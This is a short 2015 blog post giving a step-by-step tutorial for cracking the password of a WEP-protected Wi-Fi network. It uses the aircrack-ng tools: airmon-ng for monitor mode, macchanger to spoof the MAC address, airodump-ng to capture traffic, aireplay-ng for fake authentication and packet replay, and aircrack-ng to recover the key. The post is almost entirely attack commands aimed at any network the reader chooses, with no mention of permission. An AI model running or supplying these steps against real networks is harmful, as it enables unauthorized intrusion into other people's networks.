Search

Tuesday, 15 December 2015

Hacking Wifi (WEP)

Reqiurements

-->i used backtrack Os booted in vmware and alfa wireless cord to capture data.
--> the major flaw in WEP networks are they less secured and even the users are putting weak 8-10 charactered passphrases so its easy to crack compared to WPA/WPA2

just follow my steps:

  1. open a new terminal and type the following :      airmon-ng
  2. then you will get the interface connected to your computer such as "wlan0,wlan1,fire0.. something like that"
  3. then next : 'airmon-ng stop wlan0' or whatever interface you get right now my interface is wlan0 !
  4. ->> ifconfig wlan0 down.
  5. ->>  macchanger --mac 00:11:22:33:44:66 wlan0
  6. ->>  airmon-ng start wlan0
  7. so, now monitor mode(called mon0) is enabled for my interface wlan0.
  8. scanning networks ->>  airodump-ng mon0
  9. you can stop this scan at any moment when your required network is found by pressing   ctrl+c
  10. Now , choose a network and copy its bssid and channel number .                                   airodump-ng -c <channel number> -w <file name to save> --bssid <<bssid>> mon0 
  11. open a new terminal and : aireplay-ng -1 0 -a <<bssid>> -h 00:11:22:33:44:66 mon0
  12. now if it shows : 'authentication successful' then you can go further or else you need to get closer to wifi or try to crack the password later.
  13. now in the same authenticated terminal ->> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <<bssid>> -h 00:11:22:33:44:66 mon0
  14. finally : open new terminal ->>                                                                                                    aircrack-ng -b <<bssid>> /root/<file name you saved>-01.cap
  15. that's it sit back for a while and password will be cracked ;-)

you can check out my video for clear understanding




If you face any problems with this please comment !